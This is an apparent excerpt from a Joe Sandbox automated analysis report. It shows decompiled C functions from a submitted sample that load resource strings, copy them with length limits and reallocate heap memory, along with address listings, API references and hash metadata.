                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Delete__recalloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3941115546-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 549d5b9d125125be87df97f3b78c91b599c1f8f5fe8679d3d7990a42bfb54a67
                                                                                                                                                                                                                                                                                          • Instruction ID: d647ef14394235159c36904217fe9726576ea817f14fd6ba58089b87385f72a0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 549d5b9d125125be87df97f3b78c91b599c1f8f5fe8679d3d7990a42bfb54a67
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71216970A00B098FCB24CF64D885BBEB7F6EF88305F10851DEA2A97680DB71A841DF04
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                                                                                                                          			E000FD500(intOrPtr __ecx, int __edx, intOrPtr __edi, intOrPtr __esi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				short _v520;
                                                                                                                                                                                                                                                                                          				intOrPtr _v524;
                                                                                                                                                                                                                                                                                          				intOrPtr _v528;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                                                                                                          				int _t29;
                                                                                                                                                                                                                                                                                          				intOrPtr _t32;
                                                                                                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                                                                                                          				intOrPtr _t40;
                                                                                                                                                                                                                                                                                          				WCHAR* _t41;
                                                                                                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                                                                                                          				WCHAR* _t43;
                                                                                                                                                                                                                                                                                          				signed int _t44;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t42 = __esi;
                                                                                                                                                                                                                                                                                          				_t40 = __edi;
                                                                                                                                                                                                                                                                                          				_t39 = __edx;
                                                                                                                                                                                                                                                                                          				_t21 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t21 ^ _t44;
                                                                                                                                                                                                                                                                                          				_t32 = __ecx;
                                                                                                                                                                                                                                                                                          				_t23 = 0;
                                                                                                                                                                                                                                                                                          				_v524 = __ecx;
                                                                                                                                                                                                                                                                                          				if(( *(__ecx + 0xb4) & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                                                                                                          					return E001059E6(_t23, _t32, _v8 ^ _t44, _t39, _t40, _t42);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v520 = 0;
                                                                                                                                                                                                                                                                                          				_t38 = LoadStringW( *0x170c0c, __edx,  &_v520, 0x100);
                                                                                                                                                                                                                                                                                          				_t27 = 0;
                                                                                                                                                                                                                                                                                          				_v528 = _t38;
                                                                                                                                                                                                                                                                                          				if(_t38 <= 0) {
                                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                                          					_t23 = 0;
                                                                                                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t39 = 0xa;
                                                                                                                                                                                                                                                                                          				while( *((intOrPtr*)(_t44 + _t27 * 2 - 0x204)) != _t39) {
                                                                                                                                                                                                                                                                                          					_t27 = _t27 + 1;
                                                                                                                                                                                                                                                                                          					if(_t27 < _t38) {
                                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                                                                          					if(_t38 > 0) {
                                                                                                                                                                                                                                                                                          						 *(_t32 + 0xb4) =  *(_t32 + 0xb4) | 0x00008000;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_push(_t42);
                                                                                                                                                                                                                                                                                          				_push(_t40);
                                                                                                                                                                                                                                                                                          				_t41 = _t32 + 0x10;
                                                                                                                                                                                                                                                                                          				_t43 = _t44 + _t27 * 2 - 0x202;
                                                                                                                                                                                                                                                                                          				if(_t41 != 0 && _t43 != 0) {
                                                                                                                                                                                                                                                                                          					if(lstrlenW(_t43) <= 0x4f) {
                                                                                                                                                                                                                                                                                          						_t29 = lstrlenW(_t43);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t29 = 0x4f;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					lstrcpynW(_t41, _t43, _t29 + 1);
                                                                                                                                                                                                                                                                                          					_t38 = _v528;
                                                                                                                                                                                                                                                                                          					_t32 = _v524;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_pop(_t40);
                                                                                                                                                                                                                                                                                          				_pop(_t42);
                                                                                                                                                                                                                                                                                          				goto L13;
                                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                                          0x000fd500
                                                                                                                                                                                                                                                                                          0x000fd500
                                                                                                                                                                                                                                                                                          0x000fd500
                                                                                                                                                                                                                                                                                          0x000fd509
                                                                                                                                                                                                                                                                                          0x000fd510
                                                                                                                                                                                                                                                                                          0x000fd514
                                                                                                                                                                                                                                                                                          0x000fd516
                                                                                                                                                                                                                                                                                          0x000fd51f
                                                                                                                                                                                                                                                                                          0x000fd525
                                                                                                                                                                                                                                                                                          0x000fd5c5
                                                                                                                                                                                                                                                                                          0x000fd5d3
                                                                                                                                                                                                                                                                                          0x000fd5d3
                                                                                                                                                                                                                                                                                          0x000fd537
                                                                                                                                                                                                                                                                                          0x000fd54b
                                                                                                                                                                                                                                                                                          0x000fd54d
                                                                                                                                                                                                                                                                                          0x000fd54f
                                                                                                                                                                                                                                                                                          0x000fd557
                                                                                                                                                                                                                                                                                          0x000fd5c3
                                                                                                                                                                                                                                                                                          0x000fd5c3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd5c3
                                                                                                                                                                                                                                                                                          0x000fd559
                                                                                                                                                                                                                                                                                          0x000fd560
                                                                                                                                                                                                                                                                                          0x000fd56a
                                                                                                                                                                                                                                                                                          0x000fd56d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd5b5
                                                                                                                                                                                                                                                                                          0x000fd5b7
                                                                                                                                                                                                                                                                                          0x000fd5b9
                                                                                                                                                                                                                                                                                          0x000fd5b9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd5b7
                                                                                                                                                                                                                                                                                          0x000fd571
                                                                                                                                                                                                                                                                                          0x000fd572
                                                                                                                                                                                                                                                                                          0x000fd573
                                                                                                                                                                                                                                                                                          0x000fd576
                                                                                                                                                                                                                                                                                          0x000fd57f
                                                                                                                                                                                                                                                                                          0x000fd591
                                                                                                                                                                                                                                                                                          0x000fd59b
                                                                                                                                                                                                                                                                                          0x000fd593
                                                                                                                                                                                                                                                                                          0x000fd593
                                                                                                                                                                                                                                                                                          0x000fd593
                                                                                                                                                                                                                                                                                          0x000fd5a1
                                                                                                                                                                                                                                                                                          0x000fd5a7
                                                                                                                                                                                                                                                                                          0x000fd5ad
                                                                                                                                                                                                                                                                                          0x000fd5ad
                                                                                                                                                                                                                                                                                          0x000fd5b3
                                                                                                                                                                                                                                                                                          0x000fd5b4
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(000F0000,?,?,00000100), ref: 000FD545
                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?), ref: 000FD58C
                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?), ref: 000FD59B
                                                                                                                                                                                                                                                                                          • lstrcpynW.KERNEL32(?,?,00000001,?,?), ref: 000FD5A1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$LoadStringlstrcpyn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1900667794-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1a640bb3ce5ce4841d4e1cb53555d6ea4070c1bfa22f0c2e68c91a6935628a8b
                                                                                                                                                                                                                                                                                          • Instruction ID: 24a3f41f974680c89e51bf623d23e86368ec390e0c72ec647193f84f7c1109f5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a640bb3ce5ce4841d4e1cb53555d6ea4070c1bfa22f0c2e68c91a6935628a8b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10210570A0171D8BDB14DF28DD88BBE73B5EB88704F1080ABEE19D7642DB709D809B51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E001093AB(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                                                                                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                                                                                                          				long _t8;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t9;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t12;
                                                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                                                          				long _t30;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					_push(__esi);
                                                                                                                                                                                                                                                                                          					_t30 = _a8;
                                                                                                                                                                                                                                                                                          					__eflags = _t30;
                                                                                                                                                                                                                                                                                          					if(_t30 != 0) {
                                                                                                                                                                                                                                                                                          						_push(__edi);
                                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                                          							__eflags = _t30 - 0xffffffe0;
                                                                                                                                                                                                                                                                                          							if(_t30 > 0xffffffe0) {
                                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__eflags = _t30;
                                                                                                                                                                                                                                                                                          							if(_t30 == 0) {
                                                                                                                                                                                                                                                                                          								_t30 = _t30 + 1;
                                                                                                                                                                                                                                                                                          								__eflags = _t30;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t7 = HeapReAlloc( *0x171004, 0, _a4, _t30);
                                                                                                                                                                                                                                                                                          							_t27 = _t7;
                                                                                                                                                                                                                                                                                          							__eflags = _t27;
                                                                                                                                                                                                                                                                                          							if(_t27 != 0) {
                                                                                                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                                                                                                          								_t8 = _t27;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								__eflags =  *0x17166c - _t7;
                                                                                                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          									_t9 = E00107A0D(__eflags);
                                                                                                                                                                                                                                                                                          									 *_t9 = E001079CB(GetLastError());
                                                                                                                                                                                                                                                                                          									goto L17;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									__eflags = E00108912(_t7, _t30);
                                                                                                                                                                                                                                                                                          									if(__eflags == 0) {
                                                                                                                                                                                                                                                                                          										_t12 = E00107A0D(__eflags);
                                                                                                                                                                                                                                                                                          										 *_t12 = E001079CB(GetLastError());
                                                                                                                                                                                                                                                                                          										L12:
                                                                                                                                                                                                                                                                                          										_t8 = 0;
                                                                                                                                                                                                                                                                                          										__eflags = 0;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E00108912(_t6, _t30);
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(E00107A0D(__eflags))) = 0xc;
                                                                                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						E00105DE2(_a4);
                                                                                                                                                                                                                                                                                          						_t8 = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                                          					return _t8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return E00105E1C(__edx, __edi, __esi, _a8);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                                          0x001093b4
                                                                                                                                                                                                                                                                                          0x001093c1
                                                                                                                                                                                                                                                                                          0x001093c2
                                                                                                                                                                                                                                                                                          0x001093c5
                                                                                                                                                                                                                                                                                          0x001093c7
                                                                                                                                                                                                                                                                                          0x001093d6
                                                                                                                                                                                                                                                                                          0x00109409
                                                                                                                                                                                                                                                                                          0x00109409
                                                                                                                                                                                                                                                                                          0x0010940c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001093d9
                                                                                                                                                                                                                                                                                          0x001093db
                                                                                                                                                                                                                                                                                          0x001093dd
                                                                                                                                                                                                                                                                                          0x001093dd
                                                                                                                                                                                                                                                                                          0x001093dd
                                                                                                                                                                                                                                                                                          0x001093ea
                                                                                                                                                                                                                                                                                          0x001093f0
                                                                                                                                                                                                                                                                                          0x001093f2
                                                                                                                                                                                                                                                                                          0x001093f4
                                                                                                                                                                                                                                                                                          0x00109454
                                                                                                                                                                                                                                                                                          0x00109454
                                                                                                                                                                                                                                                                                          0x001093f6
                                                                                                                                                                                                                                                                                          0x001093f6
                                                                                                                                                                                                                                                                                          0x001093fc
                                                                                                                                                                                                                                                                                          0x0010943e
                                                                                                                                                                                                                                                                                          0x00109452
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001093fe
                                                                                                                                                                                                                                                                                          0x00109405
                                                                                                                                                                                                                                                                                          0x00109407
                                                                                                                                                                                                                                                                                          0x00109426
                                                                                                                                                                                                                                                                                          0x0010943a
                                                                                                                                                                                                                                                                                          0x00109420
                                                                                                                                                                                                                                                                                          0x00109420
                                                                                                                                                                                                                                                                                          0x00109420
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00109407
                                                                                                                                                                                                                                                                                          0x001093fc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00109422
                                                                                                                                                                                                                                                                                          0x0010940f
                                                                                                                                                                                                                                                                                          0x0010941a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001093c9
                                                                                                                                                                                                                                                                                          0x001093cc
                                                                                                                                                                                                                                                                                          0x001093d2
                                                                                                                                                                                                                                                                                          0x001093d2
                                                                                                                                                                                                                                                                                          0x00109423
                                                                                                                                                                                                                                                                                          0x00109425
                                                                                                                                                                                                                                                                                          0x001093b6
                                                                                                                                                                                                                                                                                          0x001093c0
                                                                                                                                                                                                                                                                                          0x001093c0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 001093B9
                                                                                                                                                                                                                                                                                            • Part of subcall function 00105E1C: __FF_MSGBANNER.LIBCMT ref: 00105E35
                                                                                                                                                                                                                                                                                            • Part of subcall function 00105E1C: __NMSG_WRITE.LIBCMT ref: 00105E3C
                                                                                                                                                                                                                                                                                            • Part of subcall function 00105E1C: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00109160,?,00000001,?,?,0010A609,00000018,00114600,0000000C,0010A699), ref: 00105E61
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 501242067-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 375aa1f57f3b9df7f43163fac31085a6c26c5942db80faab3b18adf1639f534f
                                                                                                                                                                                                                                                                                          • Instruction ID: deec0b3cb35e48d4edb7827a35bd7b42c66126466a43ef92a1162ef4f1486fc6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 375aa1f57f3b9df7f43163fac31085a6c26c5942db80faab3b18adf1639f534f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0211E732909614ABCF263BB5A91569A3794AF543B0B218425F4D8CF1E2DBF089C18B90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                          			E000FD430(int __ecx, struct HINSTANCE__* __edx, intOrPtr __edi, intOrPtr __esi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v264;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v268;
                                                                                                                                                                                                                                                                                          				intOrPtr _v272;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				signed int _t19;
                                                                                                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                                                                                                          				int _t27;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t30;
                                                                                                                                                                                                                                                                                          				int _t35;
                                                                                                                                                                                                                                                                                          				intOrPtr _t37;
                                                                                                                                                                                                                                                                                          				CHAR* _t38;
                                                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                                                          				CHAR* _t40;
                                                                                                                                                                                                                                                                                          				signed int _t41;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t39 = __esi;
                                                                                                                                                                                                                                                                                          				_t37 = __edi;
                                                                                                                                                                                                                                                                                          				_t36 = __edx;
                                                                                                                                                                                                                                                                                          				_t19 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t19 ^ _t41;
                                                                                                                                                                                                                                                                                          				_t30 = __edx;
                                                                                                                                                                                                                                                                                          				_v268 = __edx;
                                                                                                                                                                                                                                                                                          				if(( *(__edx + 0x64) & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                          					L15:
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t30, _v8 ^ _t41, _t36, _t37, _t39);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t36 =  *0x170c0c;
                                                                                                                                                                                                                                                                                          				_v264 = 0;
                                                                                                                                                                                                                                                                                          				_t35 = LoadStringA( *0x170c0c, __ecx,  &_v264, 0x100);
                                                                                                                                                                                                                                                                                          				_t25 = 0;
                                                                                                                                                                                                                                                                                          				_v272 = _t35;
                                                                                                                                                                                                                                                                                          				if(_t35 <= 0) {
                                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t36 = 0xa;
                                                                                                                                                                                                                                                                                          				while( *((intOrPtr*)(_t41 + _t25 - 0x104)) != _t36) {
                                                                                                                                                                                                                                                                                          					_t25 = _t25 + 1;
                                                                                                                                                                                                                                                                                          					if(_t25 < _t35) {
                                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                                                                          					if(_t35 > 0) {
                                                                                                                                                                                                                                                                                          						 *(_t30 + 0x64) =  *(_t30 + 0x64) | 0x00008000;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_push(_t39);
                                                                                                                                                                                                                                                                                          				_push(_t37);
                                                                                                                                                                                                                                                                                          				_t38 = _t30 + 0x10;
                                                                                                                                                                                                                                                                                          				_t40 = _t41 + _t25 - 0x103;
                                                                                                                                                                                                                                                                                          				if(_t38 != 0 && _t40 != 0) {
                                                                                                                                                                                                                                                                                          					if(lstrlenA(_t40) <= 0x4f) {
                                                                                                                                                                                                                                                                                          						_t27 = lstrlenA(_t40);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t27 = 0x4f;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					lstrcpynA(_t38, _t40, _t27 + 1);
                                                                                                                                                                                                                                                                                          					_t35 = _v272;
                                                                                                                                                                                                                                                                                          					_t30 = _v268;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_pop(_t37);
                                                                                                                                                                                                                                                                                          				_pop(_t39);
                                                                                                                                                                                                                                                                                          				goto L13;
                                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                                          0x000fd430
                                                                                                                                                                                                                                                                                          0x000fd430
                                                                                                                                                                                                                                                                                          0x000fd430
                                                                                                                                                                                                                                                                                          0x000fd439
                                                                                                                                                                                                                                                                                          0x000fd440
                                                                                                                                                                                                                                                                                          0x000fd444
                                                                                                                                                                                                                                                                                          0x000fd44a
                                                                                                                                                                                                                                                                                          0x000fd450
                                                                                                                                                                                                                                                                                          0x000fd4e6
                                                                                                                                                                                                                                                                                          0x000fd4f6
                                                                                                                                                                                                                                                                                          0x000fd4f6
                                                                                                                                                                                                                                                                                          0x000fd456
                                                                                                                                                                                                                                                                                          0x000fd46a
                                                                                                                                                                                                                                                                                          0x000fd477
                                                                                                                                                                                                                                                                                          0x000fd479
                                                                                                                                                                                                                                                                                          0x000fd47b
                                                                                                                                                                                                                                                                                          0x000fd483
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd485
                                                                                                                                                                                                                                                                                          0x000fd487
                                                                                                                                                                                                                                                                                          0x000fd490
                                                                                                                                                                                                                                                                                          0x000fd493
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd4db
                                                                                                                                                                                                                                                                                          0x000fd4dd
                                                                                                                                                                                                                                                                                          0x000fd4df
                                                                                                                                                                                                                                                                                          0x000fd4df
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd4dd
                                                                                                                                                                                                                                                                                          0x000fd497
                                                                                                                                                                                                                                                                                          0x000fd498
                                                                                                                                                                                                                                                                                          0x000fd499
                                                                                                                                                                                                                                                                                          0x000fd49c
                                                                                                                                                                                                                                                                                          0x000fd4a5
                                                                                                                                                                                                                                                                                          0x000fd4b7
                                                                                                                                                                                                                                                                                          0x000fd4c1
                                                                                                                                                                                                                                                                                          0x000fd4b9
                                                                                                                                                                                                                                                                                          0x000fd4b9
                                                                                                                                                                                                                                                                                          0x000fd4b9
                                                                                                                                                                                                                                                                                          0x000fd4c7
                                                                                                                                                                                                                                                                                          0x000fd4cd
                                                                                                                                                                                                                                                                                          0x000fd4d3
                                                                                                                                                                                                                                                                                          0x000fd4d3
                                                                                                                                                                                                                                                                                          0x000fd4d9
                                                                                                                                                                                                                                                                                          0x000fd4da
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • LoadStringA.USER32 ref: 000FD471
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?), ref: 000FD4B2
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?), ref: 000FD4C1
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000000,?,00000001,?,?), ref: 000FD4C7
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$LoadStringlstrcpyn
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1900667794-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 3a99419693aa5d26dac31adc604281dcbfd8b79850a6b492a388c08eed629032
                                                                                                                                                                                                                                                                                          • Instruction ID: ec7c6797e34e3267802193de3e35f4568b7435e0b1e8a8b616a5f7d577c17b72
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a99419693aa5d26dac31adc604281dcbfd8b79850a6b492a388c08eed629032
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B11E47060521D9BDB24DF14DD84BFA77BAEB49300F1044AAEA49D7641D7B0BD80EB90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                          			E000F49A0(void* __ecx, intOrPtr* __edi) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				int _t8;
                                                                                                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                                                                                                          				intOrPtr _t15;
                                                                                                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t26;
                                                                                                                                                                                                                                                                                          				MSG* _t28;
